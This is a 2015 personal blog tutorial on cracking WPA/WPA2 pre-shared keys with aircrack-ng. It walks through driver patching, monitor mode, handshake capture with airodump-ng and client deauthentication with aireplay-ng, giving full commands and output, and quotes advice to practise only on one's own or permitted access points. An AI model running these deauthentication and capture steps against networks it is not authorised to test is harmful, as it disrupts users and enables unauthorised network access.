Wednesday, February 11, 2015

aircrack-ng (rt2x00 Mac80211 Linux wireless stack) in Ubuntu Trusty 14.04 (14.0.4.1) LTS

Ubuntu is actually installed in a Virtualbox virtual machine on Mac OS X Yosemite 10.10 (10.10.2). Before proceeding read the important intro below from http://www.aircrack-ng.org/doku.php?id=cracking_wpa#introduction

Install aircrack-ng suite.

$ sudo apt-get install aircrack-ng

It should install and provide the following.

# dpkg -s aircrack-ng
Package: aircrack-ng
Status: install ok installed
Priority: optional
Section: net
Installed-Size: 2167
Maintainer: Ubuntu Developers
Architecture: amd64
Version: 1:1.1-6
Depends: libc6 (>= 2.15), libgcrypt11 (>= 1.4.5), libsqlite3-0 (>= 3.5.9), zlib1g (>= 1:1.1.4), wireless-tools, iw
Recommends: wget
Description: wireless WEP/WPA cracking utilities
 aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a
 40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets
 have been gathered. Also it can attack WPA1/2 networks with some advanced
 methods or simply by brute force.
 .
 It implements the standard FMS attack along with some optimizations,
 thus making the attack much faster compared to other WEP cracking tools.
 It can also fully use a multiprocessor system to its full power in order
 to speed up the cracking process.
 .
 aircrack-ng is a fork of aircrack, as that project has been stopped by
 the upstream maintainer.
Original-Maintainer: Carlos Alberto Lopez Perez
Homepage: http://www.aircrack-ng.org/

# air
airbase-ng              airdriver-ng            airodump-ng-oui-update
aircrack-ng             aireplay-ng             airolib-ng
airdecap-ng             airmon-ng               airserv-ng
airdecloak-ng           airodump-ng             airtun-ng

Patch the wi-fi card driver. Note that I am patching the Mac80211 driver in Ubuntu 14.04 (14.04.1). This is the new wireless stack of the Linux kernel. It is included in the kernel since 2.6.22, but drivers are only included since 2.6.24. This is my kernel version.

# uname -a
Linux ubuntu 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:36:28 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

I have the Hawking HWUG1 USB Wi-fi with a supported chipset (Ralink rt73). See the compatibility list.



sudo apt-get update && apt-get upgrade -y
sudo apt-get install linux-headers-$(uname -r) -y
cd /usr/src/
sudo wget http://www.kernel.org/pub/linux/kernel/projects/backports/stable/v3.17.1/backports-3.17.1-1.tar.xz
sudo tar xvfJ backports-3.17.1-1.tar.xz
cd backports-3.17.1-1
sudo apt-get install patch
sudo wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
sudo wget -Ocompatdrivers_chan_qos_frag.patch http://www.pastie.org/pastes/8846771/download
sudo patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
sudo patch -p1  < compatdrivers_chan_qos_frag.patch
sudo make defconfig-wifi
sudo make
sudo make install
sudo update-initramfs -u
reboot

Mirror of http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch -- https://gist.github.com/fortran01/dd6d2ae607d04f16404d

Mirror of http://www.pastie.org/pastes/8846771/download -- https://gist.github.com/fortran01/9bcf841a108d6c6e989c

Plug the card and this is my ifconfig.

# ifconfig wlan
wlan0     Link encap:UNSPEC  HWaddr 00-XX-XX-XX-XX-XX-XX-XX-00-00-00-00-00-00-00-00
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:175924 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:12806243 (12.8 MB)  TX bytes:0 (0.0 B)

This is the USB Wi-fi device plugged in.

# lsusb | grep Ralink
Bus 001 Device 003: ID 148f:2573 Ralink Technology, Corp. RT2501/RT2573 Wireless Adapter

Put card in monitor mode. (Notice I have the channel 11 indicated to narrow down to the channel of the AP that I want to target)


# airmon-ng start wlan0 11


Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
731     dhclient


Interface       Chipset         Driver

wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Test monitor mode. Replace with AP SSID, BSSID and monitor interface (mon0).

# aireplay-ng --test -e AztechXXX -a 00:11:22:CA:A5:44 mon0
11:53:30  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
11:53:30  Trying broadcast probe requests...
11:53:30  Injection is working!
11:53:32  Found 1 AP

11:53:32  Trying directed probe requests...
11:53:32  00:11:22:CA:A5:44 - channel: 11 - 'AztechXXX'
11:53:33  Ping (min/avg/max): 4.545ms/19.723ms/45.179ms Power: -56.60
11:53:33  30/30: 100%

Start airodump-ng to collect authentication handshake. Replace channel, BSSID, and wireless interface. More hints here http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_2_-_start_airodump-ng_to_collect_authentication_handshake (READ THE IMPORTANT INTRO BELOW)

# airodump-ng --channel 11 --bssid 00:11:22:CA:A5:44 -w psk wlan0

Here what it looks like if a wireless client is connected to the network:

  CH  11 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:11:22:CA:A5:44
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:11:22:CA:A5:44   39 100       51      116   14   9  54  WPA CCMP   PSK  AztechXXX                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:11:22:CA:A5:44  00:0F:B5:FD:FB:C2   35     0      116  
 
In the screen above, notice the “WPA handshake: 00:11:22:CA:A5:44” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  11 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:11:22:CA:A5:44   39 100       51        0    0   9  54  WPA CCMP   PSK  AztechXXX                         
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes        


Use aireplay-ng to deauthenticate the wireless client. More hints from http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_3_-_use_aireplay-ng_to_deauthenticate_the_wireless_client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following.

-c is the client. -a is the AP.

# aireplay-ng -0 1 -a 00:11:22:CA:A5:44 -c 00:0F:B5:FD:FB:C2 wlan0
16:05:49  Waiting for beacon frame (BSSID: 00:11:22:CA:A5:44) on channel 11
16:05:50  Sending 64 directed DeAuth. STMAC: [00:0F:B5:FD:FB:C2] [ 0| 0 ACKs]

Troubleshooting Tips

The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet.

To crack the PSK follow Step 4 in http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_4_-_run_aircrack-ng_to_crack_the_pre-shared_key

Intro from www.aircrack-ng.org

Source: http://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_2_-_start_airodump-ng_to_collect_authentication_handshake

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial. 
WPA/WPA2 supports many types of authentication beyond pre-shared keys.  aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.
The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.
IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

No comments: